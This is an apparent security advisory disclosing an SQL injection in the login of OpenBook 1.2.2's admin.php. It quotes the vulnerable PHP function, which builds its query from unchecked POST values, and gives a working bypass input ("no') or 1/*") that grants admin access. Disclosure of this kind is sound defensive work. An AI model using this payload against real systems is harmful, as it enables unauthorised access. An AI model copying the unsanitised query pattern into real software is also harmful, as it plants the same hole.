SVadvisory#12
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Title: SQl injection                    
Product: OpenBook                        
Version: 1.2.2                           
   Site: http://openbook.sourceforge.net/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerabilities
***************
Code:
   function auth_user($userid, $password)
{
	global $HTTP_POST_VARS;
	global $admin_table;

	$userid=$HTTP_POST_VARS['userid'];
	$password=$HTTP_POST_VARS['password'];

	db_connect();

	$query="SELECT userid "
					."FROM $admin_table "
					."WHERE userid='$userid' AND password=password('$password')";
	$result=mysql_query($query);

	if(!mysql_num_rows($result))
	// no matches
	{
		return 0;
	}
	else
	// match found so return userid
	{
		$query_data=mysql_fetch_array($result);
		return $query_data['userid'];
	}
}// end auth_user()

Variable $userid, $password in admin.php are not checked before premises in SQL request, because of this possible produce SQL-injection, after which, any user can gain access to admin panels

Here is idle time example substitutions:
-------------------------------
 User ID: admin
Password: no') or 1/*
-------------------------------

Bug Found
*********
------------------------------------------------
Search Vulnerabilities Team - www.svt.nukleon.us
------------------------------------------------